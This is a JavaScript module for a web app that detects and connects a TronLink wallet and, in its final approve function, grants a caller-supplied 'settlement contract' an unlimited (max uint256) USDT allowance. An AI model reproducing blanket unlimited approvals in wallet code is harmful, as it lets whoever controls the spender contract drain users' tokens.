import { isWalletUserRejected } from '@/utils/walletErrors'

// import { useUserStore } from '@/store/user'
// import { contractAddress } from './config'

export function getTronProvider() {
  if (typeof window === 'undefined') {
    return null
  }
  return window.tron || window.tronLink || null
}

export function getInjectedTronWeb() {
  if (typeof window === 'undefined') {
    return null
  }
  const provider = getTronProvider()
  return (provider && provider.tronWeb) || window.tronWeb || null
}

export function isTronWalletInjected() {
  return !!(getTronProvider() || (typeof window !== 'undefined' && window.tronWeb))
}

export function isTronEthereumProvider(provider) {
  if (!provider) {
    return false
  }
  // 只有明确标了 TronLink 的 ethereum 才不算独立 EVM。
  // 多链钱包也会挂 window.tron / tronLink，不能用对象身份把 ethereum 判掉。
  if (provider.isTronLink) {
    return true
  }
  if (typeof window !== 'undefined' && window.tron && provider === window.tron) {
    return true
  }
  return false
}

function waitMs(ms) {
  return new Promise((resolve) => setTimeout(resolve, ms))
}

async function waitForTronInjected(timeout = 2000) {
  if (isTronWalletInjected()) {
    return true
  }
  return new Promise((resolve) => {
    const finish = (ok) => {
      window.removeEventListener('tronWeb#initialized', onReady)
      window.removeEventListener('tronLink#initialized', onReady)
      resolve(ok)
    }
    const onReady = () => finish(true)
    window.addEventListener('tronWeb#initialized', onReady, { once: true })
    window.addEventListener('tronLink#initialized', onReady, { once: true })
    setTimeout(() => finish(isTronWalletInjected()), timeout)
  })
}

async function waitForTronAddress(timeout = 3000) {
  const start = Date.now()
  while (Date.now() - start < timeout) {
    const address = getInjectedTronWeb()?.defaultAddress?.base58
    if (address) {
      return address
    }
    await waitMs(100)
  }
  return getInjectedTronWeb()?.defaultAddress?.base58 || ''
}

function isUserRejected(error) {
  return isWalletUserRejected(error)
}

async function requestTronAccounts() {
  const provider = getTronProvider()
  const requester = (provider && provider.request)
    || (window.tronWeb && window.tronWeb.request)
    || null

  let accounts = null
  if (requester) {
    const owner = provider || window.tronWeb
    try {
      accounts = await requester.call(owner, { method: 'eth_requestAccounts' })
    } catch (error) {
      if (isUserRejected(error)) {
        throw error
      }
      accounts = await requester.call(owner, { method: 'tron_requestAccounts' })
    }
  }

  if (Array.isArray(accounts) && accounts[0]) {
    return accounts[0]
  }

  if (accounts && accounts.code && Number(accounts.code) !== 200) {
    const err = new Error(accounts.message || 'TronLink connect failed')
    err.code = accounts.code
    throw err
  }

  return await waitForTronAddress()
}

export const check = async () => {
  if (isTronWalletInjected()) {
    return true
  }
  return waitForTronInjected(2000)
}

/**
 * 请求连接钱包
 */
export const connect = async () => {
  const result = { code: 200 }
  const isChecked = await check()
  if (!isChecked) {
    result.code = 500
    result.msg = 'Please install the TronLink extension and log in to continue.'
    return result
  }

  try {
    const address = await requestTronAccounts()
    if (!address) {
      result.code = 500
      result.msg = 'TronLink not logged in'
      return result
    }
    result.data = {
      type: 'TRON',
      address
    }
  } catch (error) {
    console.log(error)
    result.code = 500
    result.msg = error.message
    result.userRejected = isUserRejected(error)
  }
  return result
}

export const initSwitchWalletEvent = async () => {}

/**
 * 授权 USDT 给结算合约
 * @param {string} spenderAddress - 结算合约地址
 */
export const approve = async (spenderAddress) => {
  const { contractAddress } = await import('./config')
  const connectResult = await connect()
  if (connectResult.code != 200) {
    return Promise.reject(new Error(connectResult.msg || 'TronLink connect failed'))
  }
  const tronWeb = getInjectedTronWeb()
  const contract = await tronWeb.contract().at(contractAddress)
  return await contract.approve(
    spenderAddress,
    '115792089237316195423570985008687907853269984665640564039457584007913129639935'
  ).send({
    feeLimit: 100000000
  })
}
